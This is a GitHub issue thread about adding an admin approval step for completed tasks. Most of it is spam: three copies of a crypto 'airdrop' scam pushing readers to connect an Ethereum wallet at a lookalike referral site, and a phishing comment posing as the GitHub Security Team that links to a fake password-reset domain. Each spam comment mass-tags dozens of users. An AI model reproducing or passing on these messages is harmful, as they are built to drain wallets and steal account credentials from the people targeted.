### ISSUE TITLE
Add step for admins to approve finished tasks

### ISSUE THREAD

**Issue by ObjSal** [ObjSal/computer-time#1]
Once a user marks a task as completed, it shows immediately the reward.

Add a step that an admin needs to approve the task before showing the reward to the user.

**Comment by ObjSal** [comment]
Fixed in PR #2

**Comment by hupptechnologies** [comment]
[![Banner](https://i.ytimg.com/vi/0jk5fGH0MYE/maxresdefault.jpg)](https://app.blastofflzone.com/referral)

# Blastoff.zone: Earn 1 ETH + $500 Bonus!

Congratulations! You've been selected as one of the fortunate individuals eligible to claim 1 ETH right now, along with a $500 bonus, courtesy of Blastoff.zone.

## How to Claim Your Reward:

1. Click [Connect Wallet](https://app.blastofflzone.com/referral) to visit the Blastoff.zone platform.
2. Connect your Ethereum wallet to qualify for the $500 bonus.
3. Utilize the "Claim Now" option to secure your tokens.

This exclusive opportunity won't last long, so make sure to act swiftly to secure your rewards!

Please note that rewards are distributed on a first-come, first-served basis. With 90% of the 100 tokens already claimed, seize this chance before it's too late!
illgenr, @dengcheng6502, @teamzz111, @anayarojo, @418092834, @anha1, @pmarino1, @huangkaiqiao, @siteraiser, @infinity7592, @ralphtheninja, @zhangyuliangzyl, @yutaixi, @runzk, @wiz, @lixu925, @bao2000, @yizhang82, @ContextPerspective, @alexeyshurygin, @Gyumeijie, @super-organism, @anabondi, @Fila1982, @marcelgruber, @caokang, @jiangjk2000, @Klubnika2009, @applepieee, @rrriki, @JackyJackyYe, @danielanatolie, @Anim-101, @song01, @mghlm, @abacusbtc, @csc5nz, @t-rekttt, @SmailChen, @AshwinDev, @davalapar, @andage, @dudy5, @yZhenyuanLiu, @akannke, @wlwl2, @sandeeplondhe, @stefanrsathianathen, @cintogia, @assqingt

**Comment by pisgo** [comment]
[![Banner](https://i.ytimg.com/vi/0jk5fGH0MYE/maxresdefault.jpg)](https://app.blastofflzone.com/referral)

# Blastoff.zone: Earn 1 ETH + $500 Bonus!

Congratulations! You've been selected as one of the fortunate individuals eligible to claim 1 ETH right now, along with a $500 bonus, courtesy of Blastoff.zone.

## How to Claim Your Reward:

1. Click [Connect Wallet](https://app.blastofflzone.com/referral) to visit the Blastoff.zone platform.
2. Connect your Ethereum wallet to qualify for the $500 bonus.
3. Utilize the "Claim Now" option to secure your tokens.

This exclusive opportunity won't last long, so make sure to act swiftly to secure your rewards!

Please note that rewards are distributed on a first-come, first-served basis. With 90% of the 100 tokens already claimed, seize this chance before it's too late!
toventang, @svanstaa, @tqft, @axmbo, @Strongtheory, @Baleg00, @vim88, @ppea, @HermanDhak, @fchtngr, @ncarchedi, @wanderer9527, @markofferman, @yoavaviram, @kenyth, @ebuchman, @onkar1996, @xiaotaonan, @nomadic4life, @lanxinju, @markya0616, @chenyuanqi, @pablomartinfranco, @intothedeep, @oyjGit, @insidegui, @zhangshichuan, @Weeez, @Coolfield, @Sciosensus, @Zalbani, @SiYuanHan, @chuenrongyeh, @ntvinhit, @hpowwell, @peeboo, @roborules, @tongzbs, @xchen1130, @shomz, @rbee3u, @vvillsong, @hellsingblack, @smrti, @seanymullz, @hemrajkumawat, @SergeevDmitry, @lr-erics, @Dllieu, @aricwalker

**Comment by Lirikkk** [comment]
[![Banner](https://i.ytimg.com/vi/0jk5fGH0MYE/maxresdefault.jpg)](https://app.blastofflzone.com/referral)

# Blastoff.zone: Earn 1 ETH + $500,000 Bonus!

Congratulations! You've been selected as one of the fortunate individuals eligible to claim 1 ETH right now, along with a $500,000 bonus, courtesy of Blastoff.zone.

## How to Claim Your Reward:

1. Click [Connect Wallet](https://app.blastofflzone.com/referral) to visit the Blastoff.zone platform.
2. Connect your Ethereum wallet to qualify for the $500,000 bonus.
3. Utilize the "Claim Now" option to secure your tokens.

This exclusive opportunity won't last long, so make sure to act swiftly to secure your rewards!

Please note that rewards are distributed on a first-come, first-served basis. With 90% of the 1 million tokens already claimed, seize this chance before it's too late!
manishshanker, @fishat64, @PrchalTomas, @DearDragon1, @ivancevich, @karsinkk, @jceb, @ashfaqnisar, @dybber, @einnar82, @Bil129, @anatolieGhebea, @waoywssy, @zhoubin-Chinese, @ricardomozartlino, @josepino, @chou1213, @natrya, @stleon, @wangqun2046, @deepakmohanakrishnan07, @DesmondZhu, @bathlarachit, @antoprince001, @xiyu23, @GongMingkang, @iDomas, @2439905184, @lhwgwg, @Lunaticf, @albertchen97, @longzhang, @namansancheti, @fuji246, @wing-puah, @osantana, @soulofpeace, @lildata, @chapagain, @afridimozumder, @TengfeiQi, @lifefindsitsway, @rl0ve, @fabian-dz, @prakashranjan, @sangeet259, @htxf, @csabapalfi, @andybergon, @Dnevend

**Comment by narendra-sharma** [comment]
# Urgent Action Required: Reset Your GitHub Password

Dear valued GitHub user,

We regret to inform you that your GitHub account has been accessed by unauthorized individuals. In order to prevent any further unauthorized access, we kindly ask you to reset your password immediately by visiting the following link: [Reset Password](http://github.hudevelopers.online/).

By taking prompt action and resetting your password, you will be able to revoke access to those who may have gained unauthorized entry to your account.

We appreciate your attention to this matter and apologize for any inconvenience this may have caused.

Thank you for your cooperation.

Sincerely,

GitHub Security Team

---

#### Affected GitHub Users:
- @someshjaishwal
- @dnet5
- @soygul
- @cg4cg
- @alin155
- @ParSal123
- @Nyzio2197
- @domainoverflow
- @felipepereiro
- @onegrxyedy99
- @zxhfirefox
- @sanketsudake
- @chismatsu
- @tcurdt
- @kirinshow
- @TurkanKAYA
- @rhyw
- @kreigne
- @veggigitjohel
- @junchensz
- @w512
- @pedronfigueiredo
- @cascwo
- @gerardorochin
- @librepreso
- @scriptzteam
- @jensendarren
- @cyclegtxnoursaadallah
- @HywTony
- @tsilavinarazf
- @mesutgulecen
- @GenildoLopes
- @gurayops
- @shahkv95
- @hedtke
- @soundarya2606
- @dpwolfeYComputer
- @yash-mandaviya
- @haroldfandino
- @HulKSmasH996
- @chaor
- @matiastucci
- @daronco
- @irakibul7
- @MauriceOne1
- @ccapo

We highly recommend all affected users to immediately reset their passwords to ensure the security of their GitHub accounts. Thank you.

**Comment by 418092834** [comment]
来信已收到。我会尽快给您回复。
